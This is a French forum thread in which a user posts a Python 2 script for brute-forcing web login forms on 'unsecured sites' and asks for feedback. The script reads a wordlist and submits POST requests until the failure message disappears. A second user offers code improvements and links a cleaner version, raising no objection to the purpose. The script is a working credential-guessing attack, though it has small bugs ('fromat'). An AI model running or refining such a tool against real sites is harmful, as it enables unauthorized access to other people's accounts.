Annonce

Réduire
Aucune annonce.

Avis d'un script fait en Python

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Avis d'un script fait en Python

    Bonjour,

    J'ai réalisé un script permettant de faire du BruteForce sur des sites non sécurisé, car j'ai essayé de le crée avec mes connaissances, le voici :

    # coding: utf8

    from requests import *
    import re

    warning = ""

    while warning != "Y":
    warning = raw_input("ATTENTION : Ce script ne marche qu'avec la method POST ! Voulez-vous continué ? [Y]/N ")
    else:
    site = raw_input("Rentrez le site à attaquez : ")
    wordlist = raw_input("Veuillez entrez le chemin de votre wordlist : ")
    id_user = raw_input("Veuillez rentrez l'id user du site : ")
    id_pass = raw_input("Veuillez rentrez l'id pass du site : ")
    user = raw_input("Veuillez rentrez l'identifiant : ")
    bad = raw_input("Veuillez rentrez ce que le site dit quand c'est un mauvais mot de passe : ")

    with open(wordlist) as f:
    content = f.readlines()

    for password in content:
    password = password.rstrip()
    payload = {id_user: user, id_pass: password}
    print("[+] On test : {0}").fromat(password)
    res = post(site,data=payload).content
    find = re.search(bad, res.decode('utf-8'))
    if find is None:
    print("Identifiant : {0} Password : {1}").format(user,password)
    break

    J'aimerai savoir vos avis, merci d'avance !

    Cordialement, Kayzek

  • #2
    Plusieurs remarques en effet,
    1. Regrettable de faire cela en python 2.x, cette version disparaîtra en 2020
    2. Pourquoi demander
      Code:
      id_pass = raw_input("Veuillez rentrez l'id pass du site : ") ?
    3. Le payload ne contient pas toujours que ces éléments
    4. Ne pas utiliser les expressions régulières pour une page web
    5. Mieux vaut,
    Code:
    with open(wordlist) as f:
        for password in f:
            # etc.
    J'ai sans doute zappé certaines choses, n'ayant pas un visuel correct du code, il devrait être indenté, merci d'utiliser les balises code avec le bouton #

    Une proposition de manière propre: Cliquer ICI !

    Commentaire


    • #3
      [*]Regrettable de faire cela en python 2.x, cette version disparaîtra en 2020

      Seulement je suis sous Kali Linux je n'arrive pas à mettre à jour ![*]Pourquoi demander
      Code:
      id_pass = raw_input("Veuillez rentrez l'id pass du site : ") ?
      Mon expliquation sur mon input et peut être mal expliqué la je demande comment s'appelle la case ou nous rentrons le mot de passe[*]Le

      payload ne contient pas toujours que ces éléments

      C'est à dire ?

      Commentaire


      • #4
        Bonjour,

        Je guide, tu fais les recherches, c'est comme cela que ça fonctionne... Ce n'est pas à moi de chercher les liens pour toi, surtout qu'en plus je donne un lien en exemple dans mon post précédent. Merci de tout lire !

        Commentaire

        Chargement...
        X